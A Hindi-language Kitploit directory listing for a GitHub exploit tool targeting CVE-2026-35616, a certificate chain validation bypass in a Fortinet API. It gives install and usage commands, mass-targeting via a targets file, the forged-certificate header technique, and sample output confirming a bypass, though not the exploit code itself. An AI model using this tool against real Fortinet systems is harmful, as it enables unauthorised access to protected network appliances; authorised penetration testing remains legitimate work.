Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/wa6n3r/cve-2026-35616
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगAPI सुरक्षा
GitHubwa6n3r/cve-2026-35616

CVE-2026-35616

CVE-2026-35616 के लिए एक्सप्लॉइट स्क्रिप्ट जो वैध CNs की खोज करके, नकली क्लाइंट प्रमाणपत्र उत्पन्न करके, और कस्टम हेडर के साथ संरक्षित एंडपॉइंट्स की जांच करके Fortinet API में प्रमाणपत्र श्रृंखला सत्यापन को बायपास करती है।

रिपॉजिटरी देखें
124 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-35616

लेखक: wa6n3r | GitHub | Web

विवरण

Fortinet API में सर्टिफिकेट चेन सत्यापन बाईपास भेद्यता का शोषण। स्क्रिप्ट स्वचालित रूप से विभिन्न स्रोतों से मान्य Common Name (CN) का पता लगाती है, नकली क्लाइंट सर्टिफिकेट उत्पन्न करती है और X-SSL-CLIENT-VERIFY तथा X-SSL-CLIENT-CERT हेडर का उपयोग करके सुरक्षित एंडपॉइंट्स पर अनुरोध करती है।

!!!महत्वपूर्ण: केवल उन सिस्टमों पर उपयोग करें जिन पर आपके पास परीक्षण की स्पष्ट अनुमति है।

आवश्यकताएँ

  • Python 3.8+
  • निर्भरताएँ:
    • requests
    • cryptography
    • urllib3
  • वैकल्पिक: openssl (TLS हैंडशेक के माध्यम से उन्नत CA पहचान के लिए)

स्थापना

root@kitploit:~
# प्रोजेक्ट क्लोन करना
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616

# निर्भरताएँ स्थापित करना
pip install -r requirements.txt

## उपयोग
# बेसिक रन
python3 exploit.py

# लक्ष्य और पोर्ट निर्दिष्ट करके
python3 exploit.py <TARGET_IP> [PORT]

# उदाहरण:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443

# लक्ष्य फ़ाइल प्रारूप (targets.txt)
बड़े पैमाने पर परीक्षण के लिए targets.txt फ़ाइल बनाएं जिसमें प्रत्येक पंक्ति में एक लक्ष्य पता हो:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal

# आउटपुट फ़ाइलें
सफल निष्पादन पर स्क्रिप्ट निम्न बनाती है:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — JSON प्रारूप में विस्तृत रिपोर्ट जिसमें:
उपयोग किया गया CN
प्रत्येक एंडपॉइंट के लिए प्रतिक्रिया स्थितियाँ
विश्लेषण के लिए प्रतिक्रिया उपसर्ग

# आउटपुट संरचना
[ wa6n3r ]  ◆  GH: github.com/wa6n3r  ◆  WEB: wa6n3r.com

[*] CVE-2026-35616 Target: https://192.168.1.100:443

[*] Discovering CA CNs from multiple sources...
  [•] TLS CA CN: 'fortinet-ca2'
  [•] ZTNA CA CN: 'support'
[*] Found 2 candidate CN(s): fortinet-ca2, support

[*] Testing 2 candidate CN(s) for bypass...
  [+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED

[*] Probing all cert_chain endpoints with CN='support'...

  GET   /api/v1/system/capabilities

        HTTP 200: '{"result": {"retval": 1, ...}}'

  [+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json
टूल डाउनलोड करें